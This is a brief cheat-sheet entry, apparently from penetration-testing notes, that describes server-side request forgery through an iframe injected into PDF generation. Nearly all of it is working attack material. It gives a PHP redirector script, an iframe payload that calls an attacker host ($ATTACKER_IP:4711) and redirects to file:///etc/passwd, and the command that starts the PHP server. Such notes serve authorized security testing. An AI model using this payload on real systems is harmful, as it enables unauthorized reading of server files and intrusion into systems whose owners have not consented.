# SSRF through iframe

* [taken from Jomar's Website](https://www.jomar.fr/posts/2021/ssrf_through_pdf_generation/)
* Upload iframe with attacker server and php code ready to be executed. Redirect to a local file on the server
```php
<?php
$loc = "http://127.0.0.1/";

if(isset($_GET['a'])){
    $loc = $_GET['a'];
}
header('Location: '.$loc);
?>
```
* Payload looks like this
```html
<iframe src="http://$ATTACKER_IP:4711/ssrf.php?a=file:///etc/passwd"/>
```
* Start a php adhoc server and run it
```php
php -S 0.0.0.0:4711
```